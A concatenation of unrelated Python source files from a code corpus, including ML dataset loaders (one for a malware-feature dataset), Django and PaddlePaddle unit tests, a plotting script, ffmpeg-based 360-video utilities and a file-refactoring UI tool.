    # NOTE(review): "pPossibly" looks like a typo for "Possibly"; the name is
    # kept since pytest discovers it by the test_ prefix either way.
    # math.log(-10) raises, so the decorator's NaN fallback is returned.
    assert np.isnan(log_possibly(-10)), 'Must result is True'
def test_Possibly_change_otherwise():
    # a per-decorator `otherwise` overrides the default NaN fallback
    @Possibly(otherwise=-1)
    def log_possibly(x):
        return math.log(x)

    assert np.isclose(log_possibly(-10), -1), 'Must result is True'
def test_Possibly_classmethod_basic_success():
    # Possibly.possibly wraps an existing callable without the decorator form
    assert np.isclose(Possibly.possibly(math.log)(10),
                      math.log(10)), 'Must result is True'
def test_Possibly_classmethod_basic_fail():
    # failing call through the classmethod form also yields the NaN fallback
    assert np.isnan(Possibly.possibly(math.log)(-1)), 'Must result is True'
def test_Possibly_classmethod_change_default():
    # NOTE(review): mutating the class-level defaults leaks into every test
    # that runs afterwards — this makes the suite order-dependent.
    Possibly.otherwise_all = 1
    Possibly.quiet_all = False
    assert np.isclose(Possibly.possibly(math.log)(-1),
                      1), 'Must result is True'
def test_Possibly_print_exception():
    # quiet=False makes the wrapper report the swallowed exception; the call
    # itself must still not raise (no assertion needed)
    @Possibly(otherwise=-1, quiet=False)
    def log_possibly(x):
        return math.log(x)

    log_possibly(-10)
| StarcoderdataPython |
import os
import sys
import numpy as np
def get_malware_dataset(valid=False):
    """Load the malware dataset as a one-step-ahead prediction task.

    With valid=True only the first month (2010-11) is used; otherwise all
    later months are concatenated. Returns (x_train, y_train, x_test, y_test)
    where training targets are the log-odds of the labels and test pairs are
    the same arrays shifted by one step.
    """
    def get_monthly_data(file_path, num_feature=483):
        '''Each row of `x_mat` is a datapoint.
        It adds a constant one for another dimension at the end for the bias term.
        Returns:
            two numpy arrays, one for input of size (num_data, num_feature) and another for the output
            (num_data,).
        '''
        x_mat = []
        y_vec = []
        with open(file_path, 'r') as datafile:
            for line in datafile:
                feature = [0] * num_feature
                feature[-1] = 1  # bias term
                items = line.split()
                y = float(items[0])
                # remaining items are sparse "index:value" pairs
                for item in items[1:]:
                    k, v = item.split(':')
                    feature[int(k)] = int(v)
                y_vec.append(y)
                x_mat.append(feature)
        return np.array(x_mat), np.array(y_vec)

    def log_odds_vec(p):
        # convert a probability to log-odds. Feel free to ignore the "divide by
        # zero" warning since we deal with it manually. The extreme values are
        # determined by looking at the histogram of the first-month data such
        # that they do not deviate too far from the others
        ind_0 = np.where(p == 0)[0]
        ind_1 = np.where(p == 1)[0]
        logodds = np.log(p) - np.log(1.-p)
        logodds[ind_0] = -5
        logodds[ind_1] = 4
        return logodds

    def read_data(valid, folder_name='./malware-dataset/'):
        if valid:
            # first month
            xs, ys = get_monthly_data('./malware-dataset/2010-11.txt')
        else:
            file_names = ['2010-12.txt', '2011-01.txt', '2011-02.txt', '2011-03.txt', '2011-04.txt', '2011-05.txt', '2011-06.txt', '2011-07.txt', '2011-08.txt', '2011-09.txt', '2011-10.txt', '2011-11.txt', '2011-12.txt', '2012-01.txt', '2012-02.txt', '2012-03.txt', '2012-04.txt', '2012-05.txt', '2012-06.txt', '2012-07.txt', '2012-08.txt', '2012-09.txt', '2012-10.txt', '2012-11.txt', '2012-12.txt', '2013-01.txt', '2013-02.txt', '2013-03.txt', '2013-04.txt', '2013-05.txt', '2013-06.txt', '2013-07.txt', '2013-08.txt', '2013-09.txt', '2013-10.txt', '2013-11.txt', '2013-12.txt', '2014-01.txt', '2014-02.txt', '2014-03.txt', '2014-04.txt', '2014-05.txt', '2014-06.txt', '2014-07.txt'] # exclude '2010-11.txt'
            xs, ys = [], []
            for f in file_names:
                x_mat, y_vec = get_monthly_data('./malware-dataset/' + f)
                xs.append(x_mat)
                ys.append(y_vec)
            xs = np.concatenate(xs, axis=0)
            ys = np.concatenate(ys)
        # one-step-ahead split: the input at time t predicts the label at t+1
        x_train_set, y_train_set = xs[:-1], ys[:-1]
        x_test_set, y_test_set = xs[1:], ys[1:]
        y_train_set = log_odds_vec(y_train_set)
        print('data size:', len(xs))
        return x_train_set, y_train_set, x_test_set, y_test_set

    return read_data(valid)
def get_elec2_dataset(valid=False):
    """Load the ELEC2 electricity-price dataset as a one-step-ahead task.

    The target for each row is the fraction of the previous 48 prices that
    are below the current price, converted to log-odds for training. The
    first 4000 rows form the validation split.
    """
    def get_all_data(file_path='./electricity-price-dataset/electricity-normalized.csv',
                     num_feature=15):
        ''' 15 features in total:
        - The first seven features are indicator of week days;
        - The eighth feature is time
        - The ninth feature is date
        - The remaining five features: NSWprice, NSWdemand, VICprice, VICdemand, transfer
        - The bias
        '''
        X, y, _y = [], [], []
        with open(file_path, 'r') as datafile:
            header = datafile.readline()
            for line in datafile.readlines():
                feature = [0] * num_feature
                feature[-1] = 1  # bias term
                items = line.split(',')
                feature[int(items[1])-1] = 1  # day (one-hot over 7 slots)
                feature[7] = float(items[2])  # time
                feature[8] = float(items[0])  # date
                fid = 9  # others
                for item in items[3:-1]:
                    feature[fid] = float(item)
                    fid += 1
                X.append(feature)
                # y.append(float(items[3])) # target
                # print(np.mean(y[-49:-1])<y[-1], items[-1])
                # NSWprice history drives the target: the fraction of the last
                # 48 prices below the current one.
                # NOTE(review): for the first ~48 rows the window is too short
                # (0/0 gives NaN under numpy), but those rows are discarded by
                # the [49:] trim below — confirm that stays in sync.
                _y.append(float(items[3]))
                y_prob = np.sum(np.array(_y[-49:-1]) < _y[-1]) / len(_y[-49:-1])
                y.append(y_prob)
                # print(y_prob, items[-1])
        # make it predict the future
        X = X[49:]
        y = y[49:]
        num_instance = len(X)
        print(f'Number of samples: {num_instance}')
        return np.array(X), np.array(y)

    def log_odds_vec(p):
        # convert a probability to log-odds. Feel free to ignore the "divide by
        # zero" warning since we deal with it manually. The extreme values are
        # determined by looking at the histogram of the first-month data such
        # that they do not deviate too far from the others
        ind_0 = np.where(p == 0)[0]
        ind_1 = np.where(p == 1)[0]
        logodds = np.log(p) - np.log(1.-p)
        logodds[ind_0] = -4
        logodds[ind_1] = 4
        return logodds

    X, y = get_all_data()
    log_odds = log_odds_vec(y)
    val_size = 4000
    if valid:
        X = X[:val_size]
        y = y[:val_size]
        log_odds = log_odds[:val_size]
    else:
        X = X[val_size:]
        y = y[val_size:]
        log_odds = log_odds[val_size:]
    # one-step-ahead split: train on log-odds targets, test on raw fractions
    x_train_set, y_train_set, x_test_set, y_test_set = X[:-1], log_odds[:-1], X[1:], y[1:]
    return x_train_set, y_train_set, x_test_set, y_test_set
def get_sensordrift_dataset(valid=False):
    """Load the gas sensor drift dataset (gas class 2) as a regression task.

    Normalization statistics (mean/std for X and y) are always computed from
    batch1; with valid=True batch1 itself is returned, otherwise batches 2-10
    are concatenated. Returns one-step-ahead (x_train, y_train, x_test, y_test).
    """
    def get_batch_data(file_path, num_feature=129):
        '''`gas_class` - dict; args in {1,...,6}
        `gas_class[i]` - dict; args in {'X', 'y'}
        `gas_class[i][j]` - list
        e.g., gas_class[2]['X']
        '''
        gas_class = {}
        for i in range(1, 7):
            gas_class[i] = {}
            gas_class[i]['X'] = []
            gas_class[i]['y'] = []
        with open(file_path, 'r') as datafile:
            for line in datafile:
                feature = [0] * num_feature
                feature[-1] = 1  # bias term
                # line format: "<class>;<concentration> <idx>:<val> ..."
                class_items = line.split(';')
                X = gas_class[int(class_items[0])]['X']
                y = gas_class[int(class_items[0])]['y']
                items = class_items[1].strip().split()
                y.append(float(items[0]))  # concentration
                for item in items[1:]:
                    k, v = item.split(':')
                    feature[int(k)-1] = float(v)
                X.append(np.array(feature))
        # summary
        print(file_path)
        for i in range(1, 7):
            assert len(gas_class[i]['X']) == len(gas_class[i]['y'])
            num_instance = len(gas_class[i]['X'])
            print(f'class{i}: {num_instance} samples')
        return gas_class

    class_id = 2
    gas_class = get_batch_data('./sensor-drift-dataset/batch1.dat')  # validation
    X, y = gas_class[class_id]['X'], gas_class[class_id]['y']
    # scaling stats come from batch1 only; the bias column is pinned to
    # mean 0 / std 1 so it survives normalization unchanged
    mu_x = np.mean(X, axis=0, keepdims=True)
    mu_x[0, -1] = 0
    scale_x = np.std(X, axis=0, keepdims=True)
    scale_x[0, -1] = 1
    mu_y = np.mean(y)
    scale_y = np.std(y)

    def scaling_x(x):
        return (x-mu_x)/scale_x

    def scaling_y(y):
        return (y-mu_y)/scale_y

    if valid:
        X = scaling_x(X)
        y = scaling_y(y)
    else:
        file_names = ['batch2.dat',
                      'batch3.dat',
                      'batch4.dat',
                      'batch5.dat',
                      'batch6.dat',
                      'batch7.dat',
                      'batch8.dat',
                      'batch9.dat',
                      'batch10.dat']
        X, y = [], []
        for file_name in file_names:
            gas_class = get_batch_data('./sensor-drift-dataset/'+file_name)
            X.append(gas_class[class_id]['X'])
            y.append(gas_class[class_id]['y'])
        X = np.concatenate(X, axis=0)
        y = np.concatenate(y, axis=0)
        X = scaling_x(X)
        y = scaling_y(y)
    # one-step-ahead split
    x_train_set, y_train_set, x_test_set, y_test_set = X[:-1], y[:-1], X[1:], y[1:]
    return x_train_set, y_train_set, x_test_set, y_test_set
28163 | <gh_stars>1-10
from django.core.exceptions import ValidationError
from django.test import TestCase
from django_analyses.models.input.types.input_types import InputTypes
from tests.factories.input.types.file_input import FileInputFactory
class FileInputTestCase(TestCase):
    """
    Tests for the :class:`~django_analyses.models.input.types.file_input.FileInput` model.
    """

    def setUp(self):
        """
        Adds the created instances to the tests' contexts.
        For more information see unittest's :meth:`~unittest.TestCase.setUp` method.
        """
        self.file_input = FileInputFactory()

    ###########
    # Methods #
    ###########
    def test_string(self):
        # __str__ should render as: 'key' = value
        value = str(self.file_input)
        expected = f"'{self.file_input.key}' = {self.file_input.value}"
        self.assertEqual(value, expected)

    def test_none_value_if_required_raises_validation_error(self):
        # a required definition must reject a None value on save()
        self.file_input.definition.required = True
        self.file_input.definition.save()
        self.file_input.value = None
        with self.assertRaises(ValidationError):
            self.file_input.save()

    def test_get_type(self):
        # file inputs report the InputTypes.FIL discriminator
        value = self.file_input.get_type()
        self.assertEqual(value, InputTypes.FIL)
| StarcoderdataPython |
import matplotlib.pyplot as plt
import numpy
import argparse
import json
import socket
def get_args():
    """Parse command-line options for the result-plot generator.

    The experiment name (-e/--exp) is mandatory; argparse exits with an
    error message when it is missing.
    """
    parser = argparse.ArgumentParser(
        description='Charcoal Dryrot Generate result plots.',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('-e', '--exp',
                        metavar='exp',
                        required=True,
                        help='The name of the experiment')
    return parser.parse_args()
def load_config(path):
    """Load the host-specific section of a JSON config file.

    Any hostname containing "hpc" is collapsed to the single key "hpc",
    so all cluster nodes share one configuration entry.
    """
    with open(path, "r") as f:
        config = json.load(f)
    host_name = socket.gethostname()
    if "hpc" in host_name:
        host_name = "hpc"
    return config[host_name]
def load_results(path):
    """Read a JSON results file and return the parsed object."""
    with open(path, 'r') as f:
        return json.load(f)
def main():
    """Render training/validation loss and accuracy curves for an experiment.

    Reads the experiment's results JSON (paths come from the host config)
    and writes one PNG per metric into the configured plots directory.
    """
    args = get_args()
    config = load_config("../config.json")
    result = load_results('{0}/results_{1}.json'.format(config['results'], args.exp))
    # (train key, validation key, y-axis label, title, output prefix)
    curves = [
        ('loss', 'val_loss', 'Cross Entropy Loss',
         'Training and Validation Losses', 'losses'),
        ('accuracy', 'val_accuracy', 'Accuracy',
         'Training and Validation Accuracies', 'accuracies'),
    ]
    for train_key, val_key, y_label, title, prefix in curves:
        plt.plot(result['results'][train_key], 'r--', label='Training')
        plt.plot(result['results'][val_key], 'b--', label='Validation')
        plt.legend()
        plt.ylabel(y_label)
        plt.xlabel('Epochs')
        plt.title(title)
        plt.savefig('{0}/{1}_{2}'.format(config['plots'], prefix, args.exp))
        plt.clf()
        plt.close()


if __name__ == "__main__":
    main()
| StarcoderdataPython |
import os, sys
import numpy as np
from pyutils.cmd import runSystemCMD
from scipy.interpolate import RegularGridInterpolator
sys.path.insert(0, '3rd-party/vrProjector/')
import vrProjector
def dir2samples(path):
    """Map youtube ids under *path* to the video files that belong to them.

    Only files with a known video/audio extension are kept; the id is the
    filename up to the first dot. Returns (samples dict, its keys view).
    """
    video_exts = ('webm', 'mp4', 'mkv', 'm4a')
    files = [fn for fn in os.listdir(path)
             if fn != 'downloaded.txt'
             and len(fn.split('.'))
             and fn.split('.')[-1] in video_exts]
    youtube_ids = [fn.split('.')[0] for fn in files]
    samples = {yid: [] for yid in youtube_ids}
    for yid, fn in zip(youtube_ids, files):
        samples[yid].append(os.path.join(path, fn))
    return samples, samples.keys()
def nonZeroChannels(inp_fn):
    """Return a per-channel boolean array: True where the audio channel has
    at least one non-zero sample.

    Extracts up to the first 300 s of audio from *inp_fn* via ffmpeg at
    10 kHz into a temporary wav, inspects it, then removes the temp file.
    Raises ValueError when ffmpeg reports an empty output file.
    """
    from scipy.io import wavfile
    sndfile = '/tmp/output.wav'
    cmd = 'ffmpeg -y -t 300 -i {} -map a -ar 10000 {}'.format(inp_fn, sndfile)
    out, stderr = runSystemCMD(cmd)
    # ffmpeg signals failure only on stderr, so scan it explicitly
    if any([l.startswith('Output file is empty') for l in stderr.split('\n')]):
        raise ValueError('ERROR: Output file is empty\nCMD: {}\n STDERR: {}'.format(cmd, stderr))
    fs, data = wavfile.read(sndfile)
    os.remove(sndfile)
    # data is (num_samples, num_channels); count non-zero samples per channel
    return (data != 0).sum(axis=0) > 0
def extract_clip(inp_fn, out_fn, rate=10, seek=None, duration=None):
    """Extract a video-only clip from *inp_fn* into *out_fn* via ffmpeg.

    :param inp_fn: input video filename
    :param out_fn: output clip filename
    :param rate: output frame rate (fps)
    :param seek: optional start position in seconds
    :param duration: optional clip length in seconds
    :raises ValueError: if ffmpeg reports an empty output file
    """
    cmd = ['ffmpeg', '-y']
    if seek is not None:
        cmd += ['-ss', '{0:.10f}'.format(seek)]
    cmd += ['-i', inp_fn]
    if duration is not None:
        cmd += ['-t', '{0:.10f}'.format(duration)]
    cmd += ['-an',                    # drop the audio stream
            '-vf', 'scale=720:360',   # normalize the resolution
            '-r', str(rate),
            '-vcodec', 'libx264',
            '-crf', '5',              # near-lossless quality
            out_fn]
    stdout, stderr = runSystemCMD(' '.join(cmd))
    if any([l.startswith('Output file is empty,')
            for l in stderr.split('\n')]):
        # BUG FIX: was the Python-2-only statement form
        # `raise ValueError, '...'`, which is a SyntaxError on Python 3;
        # the call form below is valid on both.
        raise ValueError('Output file is empty.\n' + stderr)
def my_interp2(data, x, y, pts):
    """Bilinearly sample *data* (indexed as [y, x]) at the given (y, x) *pts*.

    2-D input yields a flat array of values; 3-D input is interpolated
    channel by channel and stacked on the last axis. Out-of-bounds points
    produce NaN (bounds_error=False).
    """
    if data.ndim == 2:
        sampler = RegularGridInterpolator((y, x), data,
                                          bounds_error=False, method='linear')
        return sampler(pts)
    elif data.ndim == 3:
        channels = []
        for c in range(data.shape[2]):
            sampler = RegularGridInterpolator((y, x), data[:, :, c],
                                              bounds_error=False, method='linear')
            channels.append(sampler(pts))
        return np.stack(channels, axis=-1)
def my_imresize(data, shape):
    """Resize *data* to the spatial size shape[:2] by bilinear interpolation.

    Trailing (channel) dimensions are preserved. Both grids use normalized
    coordinates in [0, 1), matching the sampling convention used elsewhere
    in this module.
    """
    dshape = data.shape
    assert data.ndim >= len(shape)
    # normalized source-grid coordinates
    dx = np.arange(dshape[1])/float(dshape[1])
    dy = np.arange(dshape[0])/float(dshape[0])
    # normalized target sample points
    dx_grid_n, dy_grid_n = np.meshgrid(range(shape[1]), range(shape[0]))
    dx_grid_n, dy_grid_n = dx_grid_n/float(shape[1]), dy_grid_n/float(shape[0])
    pts = np.stack((dy_grid_n.reshape(-1), dx_grid_n.reshape(-1)), axis=1)
    if len(dshape) == 2:
        # promote to a single-channel image so my_interp2 takes its 3-D path
        data = data.reshape(dshape + (1,))
    if len(dshape) > 3:
        # BUG FIX: np.prod returns a scalar, and `tuple + scalar` raised a
        # TypeError; the channel count must be wrapped in a 1-tuple.
        data = data.reshape(dshape[:2] + (int(np.prod(dshape[2:])),))
    outp = my_interp2(data, dx, dy, pts)
    if len(dshape) == 2:
        # BUG FIX: the interpolation output is (num_pts, 1); the old code
        # indexed it with three axes (IndexError) and never restored the
        # 2-D spatial shape.
        outp = outp[:, 0].reshape(shape[:2])
    else:
        outp = outp.reshape(shape[:2] + dshape[2:])
    return outp
def unwarp_eac(face):
    """Undo the equi-angular cubemap (EAC) warp of a single cube face."""
    dims = face.shape
    # centered, normalized coordinates in [-0.5, 0.5]
    x = np.arange(dims[1]) / float(dims[1] - 1) - 0.5
    y = np.arange(dims[0]) / float(dims[0] - 1) - 0.5
    x_grid, y_grid = np.meshgrid(x, y)
    # invert the equi-angular mapping with arctan
    warped_x = np.arctan(2 * x_grid) * 2 / np.pi
    warped_y = np.arctan(2 * y_grid) * 2 / np.pi
    pts = np.stack((warped_y.reshape(-1), warped_x.reshape(-1)), axis=1)
    unwarped = my_interp2(face, x, y, pts).reshape(dims)
    # points that fell outside the grid come back as NaN; zero them out
    unwarped[np.isnan(unwarped)] = 0
    return unwarped
def cub2eqr(left, front, right, top, back, bottom, width=720, height=360, dtype=np.uint8):
    """Reproject six cube-map faces into one equirectangular image."""
    cubemap = vrProjector.CubemapProjection()
    cubemap.setImages(front, right, back, left, top, bottom)
    cubemap.set_use_bilinear(True)
    equirect = vrProjector.EquirectangularProjection()
    equirect.initImage(width, height, dtype=dtype)
    equirect.reprojectToThis(cubemap)
    return equirect.image
def gen_eac2eqr_maps(eac_shape, eqr_shape, stereopsis='MONO'):
    """Build (x, y) sampling maps that remap an EAC frame to equirectangular.

    NOTE(review): the face-splitting arithmetic below relies on `/` producing
    integer slice bounds, which only holds on Python 2 — on Python 3 these
    would be floats and the slicing would fail. Confirm the target interpreter.
    """
    # Input grids
    xgrid, ygrid = np.meshgrid(range(eac_shape[1]), range(eac_shape[0]))
    eac_grid = np.stack((xgrid, ygrid), axis=2)
    # Grab 1st stereo channel only
    if stereopsis == 'STEREO':
        eac_grid = np.rot90(eac_grid[:, :eac_shape[1]/2, :], -1)
    # Split faces: the EAC layout is a 2x3 mosaic — the top row holds
    # left|front|right and the bottom row holds rotated bottom|back|top
    hs = eac_grid.shape[0]/2
    ws = eac_grid.shape[1]/3
    face_dims = (min(hs, ws), min(hs, ws))
    faces = ['left', 'front', 'right', 'top', 'back', 'bottom']
    eac_grid = {'left': my_imresize(eac_grid[:hs, :ws, :], face_dims),
                'front': my_imresize(eac_grid[:hs, ws:2*ws, :], face_dims),
                'right': my_imresize(eac_grid[:hs, 2*ws:, :], face_dims),
                'bottom': my_imresize(np.rot90(eac_grid[hs:, :ws, :], -1), face_dims),
                'back': my_imresize(np.rot90(eac_grid[hs:, ws:2*ws, :]), face_dims),
                'top': my_imresize(np.rot90(eac_grid[hs:, 2*ws:, :], -1), face_dims)}
    # EAC to CubeMap
    cub_grid = {f: unwarp_eac(eac_grid[f]) for f in faces}
    # pad a third channel so each face has the layout the projector expects
    cub_grid = {f: np.pad(cub_grid[f], ((0, 0), (0, 0), (0, 1)), 'constant') for f in faces}
    # CubeMap to EquiRect
    eqr_grid = cub2eqr(width=eqr_shape[1], height=eqr_shape[0], dtype=np.float32, **cub_grid)
    xmap, ymap = eqr_grid[:, :, 0], eqr_grid[:, :, 1]
    return xmap, ymap
def save_pgm(fp, map, mmax):
    """Write *map* as a plain-text (P2) PGM image to the open file *fp*.

    :param fp: writable text file object
    :param map: 2-D array of pixel values
    :param mmax: maximum gray value for the PGM header
    """
    height, width = map.shape[:2]
    fp.write('P2\n{} {}\n{}\n'.format(width, height, mmax))
    for row_idx in range(height):
        row_text = ' '.join(str(num) for num in map[row_idx, :])
        fp.write(row_text + '\n')
| StarcoderdataPython |
"""Unit tests for Coptic NLP"""
import io, re, os, sys
from collections import defaultdict
from six import iterkeys
script_dir = os.path.dirname(os.path.realpath(__file__)) + os.sep
data_dir = script_dir + "data" + os.sep
lib_dir = script_dir + "lib" + os.sep
from coptic_nlp import nlp_coptic
from lib.stacked_tokenizer import StackedTokenizer
PY3 = sys.version_info[0] == 3
class CopticTest:
    """Collects NLP test cases grouped by flag configuration and runs each
    group through nlp_coptic with a shared, reconfigured StackedTokenizer.

    Inputs in one group are concatenated (each terminated with "_") and
    processed in a single nlp_coptic call; each expected output is then
    checked as a substring of that shared response.
    """

    def __init__(self):
        # flags string -> list of (input, expected_output, comment) tuples
        self.tests = defaultdict(list)
        self.total = 0
        self.success = 0

    def add_test(self,data,expected_out,flags,comment):
        """Register one test case under its flag configuration."""
        self.tests[flags].append((data,expected_out,comment))

    def run_tests(self):
        """Run every registered group and report PASS/FAIL to stderr."""
        stk = StackedTokenizer(pipes=True,
                               segment_merged=False, detok=0, ambig=data_dir + "ambig.tab")
        for test in sorted(list(iterkeys(self.tests))):
            sys.stderr.write("o Testing configuration: " + test + "\n")
            # concatenate all inputs of the group, each ending with "_"
            all_inputs = ""
            for tup in self.tests[test]:
                data, _, _ = tup
                if not data.endswith("_"):
                    data = data.strip()+"_"
                all_inputs += data + "\n"
            # translate the flag string into tokenizer/pipeline settings
            flags = test.strip().split(" ")
            sgml_mode = "pipes" if "pipes" in flags else "sgml"
            if sgml_mode == "pipes":
                stk.pipes = True
            else:
                stk.pipes = False
            tok_mode = "from_pipes" if "from_pipes" in flags else "auto"
            if tok_mode == "from_pipes":
                stk.tokenized = True
            else:
                stk.tokenized = False
            detokenize = 0
            norm = multiword = tag = lemma = etym = unary = parse = False
            if "-penmult" in flags:
                norm = multiword = tag = lemma = etym = unary = parse = True
            if "-enult" in flags:
                norm = tag = lemma = etym = True
            if "-d" in flags:
                # detokenization level 1-3; level 2 also enables aggressive mode
                aggressive = False
                if "1" in flags:
                    detokenize = 1
                elif "2" in flags:
                    detokenize = 2
                    aggressive = True
                elif "3" in flags:
                    detokenize = 3
                stk.detokenize = detokenize
                stk.load_detokenizer(aggressive=aggressive)
            segment_merged = False
            nlp_resp = nlp_coptic(all_inputs, do_tok=True,
                                  do_norm=norm, do_mwe=multiword, do_tag=tag, do_lemma=lemma,
                                  do_lang=etym, do_milestone=unary, do_parse=parse, sgml_mode=sgml_mode,
                                  tok_mode=tok_mode, preloaded=stk,
                                  detokenize=detokenize,
                                  segment_merged=segment_merged)
            # every expected output must occur somewhere in the group response
            for tup in self.tests[test]:
                _, expected, comment = tup
                self.total += 1
                self.success += self.compare(nlp_resp,expected,comment)
        sys.stderr.write("\nFinished " + str(self.total) + " tests (" + str(self.success)+"/" + str(self.total) +" successful)\n")

    def compare(self,response,expected,comment):
        """Return 1 when *expected* is a substring of *response*, else 0."""
        if len(comment) > 0:
            sys.stderr.write("\t" + comment + "\n")
        if expected in response:
            sys.stderr.write("\t\tPASS\n")
            return 1
        else:
            sys.stderr.write("\t\tFAIL (expected: "+ expected + ")\n")
            return 0
# Load the tab-separated test definitions; collapse runs of tabs so every
# line has exactly one input/expected separator.
lines = io.open(data_dir+"tests.dat",encoding="utf8").read().strip()
lines = re.sub(r"\t+","\t",lines)
lines = lines.split("\n")
t = CopticTest()
comment = ""
flags = "-o pipes"  # default configuration until a "flags" line overrides it
for line in lines:
    if line.strip().startswith("#"):
        # a comment line annotates the next test case
        comment = line.replace("#","").strip()
    elif "\t" in line:
        fields = line.strip().split("\t")
        if fields[0].strip().startswith("flags"):
            # "flags<TAB>..." lines switch the configuration for what follows
            flags = fields[1].strip()
        else:
            t.add_test(fields[0].strip(),fields[1].strip(),flags=flags,comment=comment)
            comment = ""
t.run_tests()
| StarcoderdataPython |
import ui
from os import getcwd, listdir, mkdir, rename
from os.path import isdir, join
from threading import Thread
from random import choice
from time import sleep
leidos = 0
cambiados = 0
finish = False
def map_dirs(directory=getcwd()):
    """Recursively list every file and directory path under *directory*.

    NOTE: the default argument is evaluated once at import time, so it is
    the CWD of module load, not of each call.
    """
    entries = []
    for name in listdir(directory):
        full_path = join(directory, name)
        entries.append(full_path)
        if isdir(full_path):
            entries.extend(map_dirs(full_path))
    return entries
def not_equal(parameters: list):
    """Rewrite imports of the old module name inside a file that is NOT the
    renamed module itself.

    Files that alias the import (``import old as x``) are left untouched,
    since a blind rename would break the alias usage.

    :param parameters: [file, new_file, location, file_name, import_name,
        new_import_name, old, new]
    :return: 1 if the file was rewritten, 0 otherwise.
    """
    file, new_file, location, file_name, import_name, new_import_name, old, new = parameters
    changes = False
    data = open(file, 'r').read()
    if 'import {}'.format(import_name) in data:
        # BUG FIX: the aliased-import check previously tested the literal
        # string 'import {} as ' (missing .format), so it never matched and
        # aliased imports were rewritten too.
        if 'import {} as '.format(import_name) not in data:
            # NOTE(review): plain substring replace — occurrences of the name
            # embedded in longer identifiers are also rewritten.
            data = data.replace(import_name, new_import_name)
            changes = True
    if changes:
        f = open(file, 'w')
        f.write(data)
        f.close()
        return 1
    return 0
def equal(parameters: list):
    """The file itself matches the old module name: rename it on disk.

    :param parameters: [file, new_file, ...] — only the first two are used.
    :return: 1 (one file changed).
    """
    file, new_file = parameters[0], parameters[1]
    rename(file, new_file)
    return 1
def determine_equality(file, old, new):
    """Dispatch *file* to the rename / import-rewrite handlers.

    Files named exactly *old* are renamed; directories are skipped; any
    other file gets its imports rewritten. Returns 1 on change, else 0.
    """
    parts = file.split('/')
    location = '/'.join(parts[:-1])
    file_name = parts[-1]
    new_file = join(location, new)
    import_name = old.split('.')[0]
    new_import_name = new.split('.')[0]
    parameters = [
        file, new_file, location, file_name, import_name, new_import_name, old, new
    ]
    if file_name == old:
        return equal(parameters)
    if isdir(file):
        return 0
    return not_equal(parameters)
def Tread_for_determine_equality(file, old, new):
    # Thread target: run determine_equality and accumulate the change count.
    # NOTE(review): the name looks like a typo for "Thread_...", and the
    # unsynchronized `+=` on a shared global from many threads is not atomic
    # — updates can be lost under contention.
    global cambiados
    cambiados += determine_equality(file, old, new)
def refractor(_map, old, new):
    # Walk the file map, spawning one worker thread per entry; the global
    # `leidos` counts files dispatched and the 0.2 s sleep throttles thread
    # creation.
    global leidos
    for file in _map:
        leidos += 1
        Thread(target=Tread_for_determine_equality, args=(file, old, new)).start()
        sleep(0.2)
def update_labels(len_map):
    # UI refresh loop: mirror the global counters into the two labels until
    # every entry has been dispatched.
    # :param len_map: total number of entries to process, as int — the loop
    #     terminates once `leidos` reaches this count.
    global leidos, cambiados, finish
    while not finish:
        v['label1'].text = str(leidos)
        v['label2'].text = str(cambiados)
        if leidos == len_map:
            finish = True
def start(sender):
    """UI callback: read the text fields and launch the refactor run in
    background threads (one for the label refresh, one for the workers)."""
    sender.enabled = False
    directory = join(getcwd(), v['textfield3'].text)
    old, new = v['textfield1'].text, v['textfield2'].text
    _map = map_dirs(directory)
    # BUG FIX: update_labels expects the total COUNT of entries; the list
    # itself was passed before, so `leidos == len_map` could never become
    # true and the refresh loop never terminated.
    Thread(target=update_labels, args=(len(_map), )).start()
    Thread(target=refractor, args=(_map, old, new)).start()
# Launch the Pythonista UI; on Ctrl-C, flag the label-refresh loop to stop
# so the background thread can exit.
try:
    v = ui.load_view('refactor.pyui')
    v.present()
except KeyboardInterrupt:
    print('bye')
    finish = True
#!/usr/bin/env python3
# Read four decimal values and a target average from stdin; all arithmetic is
# done in integer hundredths to avoid floating-point error.
t = sorted([int(round(100*float(x))) for x in input().split()])
o = int(round(100*float(input())))
best = (t[0] + t[1] + t[2])    # sum of the three smallest values
worst = (t[1] + t[2] + t[3])   # sum of the three largest values
# compare 3*target against the best/worst achievable three-value sums
if 3*o < best: print('impossible')
elif 3*o >= worst: print('infinite')
else: print(f'{(3*o-t[1]-t[2])/100.:.2f}')  # largest value still meeting the target
| StarcoderdataPython |
# Source file: python/paddle/fluid/tests/unittests/test_set_value_op.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Test set_value op in static mode
from __future__ import print_function
import unittest
import numpy as np
import paddle
from paddle.fluid.layer_helper import LayerHelper
from functools import reduce
class TestSetValueBase(unittest.TestCase):
    """Shared fixture: an all-ones numpy reference array plus a fresh static
    Program.

    Subclasses override set_shape / set_value / set_dtype and the pair
    _call_setitem / _get_answer so that each covers one indexing form,
    applied identically to a paddle tensor and the numpy reference.
    """

    def setUp(self):
        paddle.enable_static()
        self.set_dtype()
        self.set_value()
        self.set_shape()
        self.data = np.ones(self.shape).astype(self.dtype)
        self.program = paddle.static.Program()

    def set_shape(self):
        self.shape = [2, 3, 4]

    def set_value(self):
        self.value = 6

    def set_dtype(self):
        self.dtype = "float32"

    def _call_setitem(self, x):
        # the indexing form under test, applied to the paddle tensor
        x[0, 0] = self.value

    def _get_answer(self):
        # the same assignment applied to the numpy reference
        self.data[0, 0] = self.value
class TestSetValueApi(TestSetValueBase):
    """Runs the fixture in both static-graph and dynamic (eager) mode and
    compares each result against the numpy reference from _get_answer."""

    def _run_static(self):
        # build and execute the assignment inside a static Program on CPU
        paddle.enable_static()
        with paddle.static.program_guard(self.program):
            x = paddle.ones(shape=self.shape, dtype=self.dtype)
            self._call_setitem(x)
            exe = paddle.static.Executor(paddle.CPUPlace())
            out = exe.run(self.program, fetch_list=[x])
        paddle.disable_static()
        return out

    def _run_dynamic(self):
        # same assignment executed eagerly
        paddle.disable_static()
        x = paddle.ones(shape=self.shape, dtype=self.dtype)
        self._call_setitem(x)
        out = x.numpy()
        paddle.enable_static()
        return out

    def test_api(self):
        static_out = self._run_static()
        dynamic_out = self._run_dynamic()
